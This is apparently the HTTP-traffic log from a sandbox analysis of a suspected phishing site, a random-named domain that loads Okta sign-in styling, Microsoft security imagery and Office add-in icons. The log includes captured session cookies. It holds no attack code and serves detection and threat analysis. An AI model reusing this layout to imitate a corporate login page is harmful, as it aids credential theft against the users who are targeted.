              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveOrigin: https://y0x6.tjsqawfetli.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveOrigin: https://y0x6.tjsqawfetli.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/icon-80.png HTTP/1.1Host: addins.verityrms.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /integrations/office365/images/icon-80.png HTTP/1.1Host: wireframepro.mockflow.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/01/MS-Security.png HTTP/1.1Host: www.ivo-security.blogConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveOrigin: https://y0x6.tjsqawfetli.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveOrigin: https://y0x6.tjsqawfetli.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34iyqRIj4uqUbeg5dCF2ghaihKiMc5js7oxkB67110 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxdC57pVq7OFKAZ3ckUst5gc4IjmY47Il0FITRSk34130 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opHEkFr4q1WYO5T8k73FNznYcuhCiUef12JKL94q3dnBi6rN67131 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250326%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250326T150951Z&X-Amz-Expires=300&X-Amz-Signature=1ffd6bca3c8f8479889bae4eab42a9117f7fa8b84e2d94dd3c9d5c04f1b55972&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/icon-80.png HTTP/1.1Host: addins.verityrms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /integrations/office365/images/icon-80.png HTTP/1.1Host: app.mockflow.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ef7Ix5bMCWZ8fN6mjluRrrPLIbOzElXijXDPs7OuLhBG890145 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kl4lB5NwdKx55JKSBrT1syOqZ5AE2wi6lKKLXcdqmKvsRgFbLliPAdS7m78168 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
